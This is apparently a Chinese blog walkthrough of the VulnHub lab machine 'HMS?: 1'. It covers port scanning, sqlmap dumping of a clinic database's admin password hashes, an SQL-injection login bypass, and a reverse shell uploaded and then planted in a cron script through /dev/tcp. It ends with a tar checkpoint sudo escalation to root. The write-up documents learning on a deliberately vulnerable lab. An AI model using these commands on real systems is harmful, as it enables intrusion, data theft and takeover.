英文名称:HMS?: 1中文名称:嗯?:1发布日期:2021 年 7 月 28 日难度:容易描述:这适用于 VirtualBox 而不是 VMware下载地址:https://www.vulnhub.com/entry/hms-1,728/
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、主机发现(192.168.199.149)
主机发现
2、端口扫描(21、22)
端口扫描
3、匿名登录ftp,发现是空军,空空如也
匿名登录ftp
4、重新扫描端口(21、22、7080)nmap -sS 192.168.199.149 -p1-65535
全端口扫描
5、访问页面
访问页面
6、burp代理,尝试访问
burp代理
7、探测是否存在SQL注入
存在SQL注入
8、SQLmap探测1、探测数据库sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" --current-dbcurrent database: 'clinic_db'2、探测表sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" -D clinic_db --tables[24 tables]+----------------------+| user || admin || appointment || billing || billing_records || department || doctor || doctor_timings || manage_website || medicine || orders || patient || payment || prescription || prescription_records || room || service_type || tbl_email_config || tbl_permission || tbl_permission_role || tbl_role || tbl_sms_config || treatment || treatment_records |+----------------------+3、探测表结果sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" -D clinic_db -T admin --columnsDatabase: clinic_dbTable: admin[17 columns]+---------------+---------------+| Column | Type |+---------------+---------------+| addr | varchar(500) || created_on | date || delete_status | int(11) || dob | text || fname | varchar(50) || gender | varchar(500) || id | int(11) || image | varchar(2000) || last_login | date || lname | varchar(500) || loginid | varchar(30) || mobileno | text || notes | varchar(200) || password | varchar(100) || role_id | int(11) || updated_on | date || username | varchar(500) |+---------------+---------------+4、拖库sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" -D clinic_db -T admin -C username,password --dumpDatabase: clinic_dbTable: admin[1 entry]+----------+------------------------------------------------------------------+| username | password |+----------+------------------------------------------------------------------+| admin | aa7f019c326413d5b8bcad4314228bcd33ef557f5d81c7cc977f7728156f4357 |+----------+------------------------------------------------------------------+9、同样的手法,没有明文+-----------------+------------------------------------------------------------------+| doctorname | password |+-----------------+------------------------------------------------------------------+| Dr. Akash Ahire | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 |+-----------------+------------------------------------------------------------------++-------------+------------------------------------------------------------------+| patientname | password |+-------------+------------------------------------------------------------------+| Atul Petkar | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 |+-------------+------------------------------------------------------------------+10、在burp中尝试SQL注入的万能密码,成功登录
将邮箱换成万能密码
成功登录
11、查看源代码
查看源代码
12、访问页面
访问页面
13、上传反弹shell
上传反弹shell
14、反弹成功
反弹成功
15、找到普通flag
普通flag
16、寻找特权文件find / -perm -u=s -type f -exec ls -al {} \; 2>&1 | grep -v "Permission denied"
寻找特权文件
17、at 无权限
无权限
18、查看定时任务$ cat /home/eren/backup.sh#!/bin/bashBACKUP_DIR="/home/eren/backups"tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
查看定时任务
19、切换身份,将反弹shell写入定时任务,等待5分钟echo "bash -i >& /dev/tcp/192.168.199.247/7777 0>&1" >> /home/eren/backup.sh
写入定时任务
5分钟后,得到shell
20、tar 提权,获得root的flagsudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"
tar 提权
到此,实验完成~
发布于 2022-08-28 19:08
